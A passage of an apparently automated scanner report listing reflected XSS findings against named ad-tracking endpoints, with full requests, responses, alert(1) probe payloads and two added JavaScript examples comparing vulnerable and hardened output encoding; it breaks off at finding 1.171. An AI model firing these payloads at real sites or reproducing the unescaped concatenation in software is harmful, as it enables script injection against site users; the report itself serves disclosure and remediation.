Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2122
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
L_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting&76078'-alert(1)-'c928e37433f=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.163. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f65f'-alert(1)-'07ff354e24b was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work3f65f'-alert(1)-'07ff354e24b&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2020
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
rnal preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work3f65f'-alert(1)-'07ff354e24b&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?mig
...[SNIP]...
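The response above is JavaScript (despite the text/html Content-Type) intended to be pulled in by a script element on the publisher page, and the "Push to ZAP" line rebuilds the query string as a single-quoted literal. The following is an added example, not code from this report or from the ad server: it models that emitter beside a hardened one and executes both with alert() stubbed so the difference is observable. The function names, the emitter templates and the second payload (ATTACK_QS_DQ) are assumptions made for the example; the first input is the query string from the request in 1.163.

```javascript
// Added example, not code from the original report or from the ad server.
// Models the "Push to ZAP" line seen in the response bodies of this report,
// where the raw query string is dropped into a single-quoted JavaScript
// string literal, beside a hardened emitter, and checks both by executing
// the emitted script with alert() replaced by a recorder.

// Constructed input: the query string from the request in 1.163, payload included.
const ATTACK_QS =
  "&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work3f65f'-alert(1)-'07ff354e24b" +
  "&_RM_HTML_title_=Work%20-%20Xaxis" +
  "&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work";

// Constructed input (assumption, not from the report): a payload aimed at a
// double-quoted literal and at the surrounding <script> element, to show the
// hardened emitter handles both.
const ATTACK_QS_DQ = '&Section=Work"-alert(2)-"</script><script>alert(3)</script>';

// Vulnerable emitter: plain concatenation into a '...' literal, as in the
// responses above. A single quote in the input ends the literal and whatever
// follows is parsed as code.
function renderTrackingScriptVulnerable(qs) {
  return "// Push to ZAP\nvar qs='" + qs + "';\n";
}

// Hardened emitter: serialise the value as a JSON string literal (escapes
// '"', '\\' and control characters), then additionally escape what JSON leaves
// alone but a <script> element or a later HTML context cares about:
//   '<' and '>'  so "</script>" cannot close an inline script element,
//   '&'          harmless inside <script>, escaped defensively for attribute reuse,
//   U+2028/2029  legal in JSON strings but line terminators to older JS parsers.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderTrackingScriptHardened(qs) {
  return '// Push to ZAP\nvar qs=' + toJsStringLiteral(qs) + ';\n';
}

// The scanner's test: did the payload survive the round trip byte for byte?
// On its own this is not proof of XSS; the context decides (see the note below).
function reflectsUnmodified(body, payload) {
  return body.indexOf(payload) !== -1;
}

// Would an HTML parser see an inline script element closed early?
function containsScriptCloser(script) {
  return /<\/script/i.test(script);
}

// Execute an emitted snippet the way the browser would, with alert() stubbed,
// and report whether alert fired, what qs holds, and any runtime error.
function runEmittedScript(script) {
  const calls = [];
  const alertStub = (x) => { calls.push(x); };
  let qs;
  let error = null;
  try {
    qs = new Function('alert', script + '\nreturn qs;')(alertStub);
  } catch (e) {
    error = e;
  }
  return { alertCalls: calls, qs: qs, error: error };
}

// Stand-alone run: both outcomes side by side.
for (const [name, render] of [
  ['vulnerable', renderTrackingScriptVulnerable],
  ['hardened', renderTrackingScriptHardened],
]) {
  const r = runEmittedScript(render(ATTACK_QS));
  console.log(name + ': alert calls=' + JSON.stringify(r.alertCalls) + ' qs=' + String(r.qs));
}
```

Note that the hardened output still contains the scanner's payload 3f65f'-alert(1)-'07ff354e24b byte for byte, yet alert never fires: the delimiters are now double quotes and a single quote is inert inside them. "Echoed unmodified" is therefore evidence, not the verdict; the quoting context is what the reflection has to be judged against. Because the body is loaded as a script by the embedding page, the injected code would run in that page's origin; opening the URL directly as text/html would only render the text.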

1.164. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d719b"><script>alert(1)</script>eac91876b3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisd719b"><script>alert(1)</script>eac91876b3e/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisd719b"><script>alert(1)</script>eac91876b3e/999287706/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...
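Here the context is different from the script findings: the path segment lands inside a double-quoted HREF attribute of an HTML response, so the first double quote in the input ends the attribute value and the rest of the payload is parsed as new markup, which executes when the URL is opened directly. The report gives no remediation detail for this finding; the fix is to encode for each context the value passes through, first as a URL path segment and then as an HTML attribute value. The following is an added example, not code from this report or from the ad server: it models the anchor builder beside a hardened one and locates where the attribute value actually ends in each case. The function names and the shortened fixed part of the click URL are assumptions; the path segment is the one from the request in 1.164.

```javascript
// Added example, not code from the original report or from the ad server.
// Models the click-through anchor seen in finding 1.164, where a path segment
// of the request URL is concatenated into a double-quoted HREF attribute,
// beside a hardened builder, and checks where the attribute value ends.

// Constructed input: the second path segment from the request in 1.164,
// carrying the scanner's payload.
const ATTACK_SEGMENT = 'TRACK_Xaxisd719b"><script>alert(1)</script>eac91876b3e';

// Fixed parts of the click URL, shortened from the response above (assumption).
const CLICK_PREFIX = 'http://b3.mookie1.com/RealMedia/ads/click_lx.ads/';
const CLICK_SUFFIX = '/999287706/x54/default/empty.gif';

// Vulnerable builder: raw concatenation. The first '"' in the segment ends the
// attribute value; everything after the following '>' is parsed as markup.
function renderClickAnchorVulnerable(segment) {
  return '<A HREF="' + CLICK_PREFIX + segment + CLICK_SUFFIX +
    '" target="_top"><IMG SRC="/empty.gif"></A>';
}

// HTML attribute encoder: the five characters that can end or alter a quoted
// attribute value. encodeURIComponent leaves "'" alone, which is why this layer
// still matters even after the URL layer below.
function encodeHtmlAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened builder: two layers, one per context the value passes through.
// 1. The value is a URL path segment, so percent-encode it; '"', '<', '>' and
//    '/' become %22, %3C, %3E and %2F, and the server can decode it losslessly.
// 2. The URL then goes into an HTML attribute, so entity-encode the whole href.
//    After step 1 only the fixed part of the URL can contribute such characters,
//    but applying the encoder unconditionally keeps the template safe if that
//    fixed part ever changes.
function renderClickAnchorHardened(segment) {
  const href = CLICK_PREFIX + encodeURIComponent(segment) + CLICK_SUFFIX;
  return '<A HREF="' + encodeHtmlAttribute(href) +
    '" target="_top"><IMG SRC="/empty.gif"></A>';
}

// Where does the HREF attribute value end? Mirrors the tokenizer rule that a
// double-quoted attribute value runs to the next '"'. Returns the value and the
// markup after it, so the caller can see whether the payload left the attribute.
function splitAtHref(html) {
  const m = /HREF="([^"]*)"([\s\S]*)$/.exec(html);
  return m ? { href: m[1], rest: m[2] } : null;
}

// Scanner-style check: does a '<script' tag start appear outside any
// double-quoted attribute value? A simple quote toggle is enough for markup
// that only uses double-quoted attributes, as this response does.
function hasScriptTagOutsideAttributes(html) {
  let inQuotes = false;
  for (let i = 0; i < html.length; i++) {
    if (html[i] === '"') {
      inQuotes = !inQuotes;
    } else if (!inQuotes && html.startsWith('<script', i)) {
      return true;
    }
  }
  return false;
}

// Stand-alone run: show the attribute boundary for both builders.
for (const [name, render] of [
  ['vulnerable', renderClickAnchorVulnerable],
  ['hardened', renderClickAnchorHardened],
]) {
  const parts = splitAtHref(render(ATTACK_SEGMENT));
  console.log(name + ': href ends at "' + parts.href.slice(-16) +
    '", markup after it starts with "' + parts.rest.slice(0, 12) + '"');
}
```

The vulnerable output's attribute ends at TRACK_Xaxisd719b and the markup after it begins with the injected script element; the hardened output keeps the whole payload inside the attribute as a percent-encoded segment that decodeURIComponent restores exactly, so the click-through still works while no tag can be opened.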

1.165. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b303"><script>alert(1)</script>e44c6d110af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1047280635@x549b303"><script>alert(1)</script>e44c6d110af?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1700089811/x549b303"><script>alert(1)</script>e44c6d110af/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.166. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f14'-alert(1)-'c10f5b57751 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Worke7f14'-alert(1)-'c10f5b57751 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2020
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ge();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Worke7f14'-alert(1)-'c10f5b57751';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.167. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2912'-alert(1)-'c7300bc2594 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contactb2912'-alert(1)-'c7300bc2594&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2020
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
eTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contactb2912'-alert(1)-'c7300bc2594&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
...[SNIP]...

1.168. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 769cf'-alert(1)-'e448cdc90e5 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis769cf'-alert(1)-'e448cdc90e5&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2076
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
d does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis769cf'-alert(1)-'e448cdc90e5&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var x
...[SNIP]...

1.169. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d3c'-alert(1)-'b2c4fcce2af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work&21d3c'-alert(1)-'b2c4fcce2af=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2023
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
e();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work&21d3c'-alert(1)-'b2c4fcce2af=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.170. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the _RM_HTML_url_ request parameter (reported as &_RM_HTML_url_ because the query string begins with ?&, so the leading ampersand is carried along with the name) is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36ef'-alert(1)-'8cc5508115d was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/a36ef'-alert(1)-'8cc5508115d&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2043
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
is external preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/a36ef'-alert(1)-'8cc5508115d&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=330
...[SNIP]...

1.171. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b8d"><script>alert(1)</script>2d9f50bf1e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

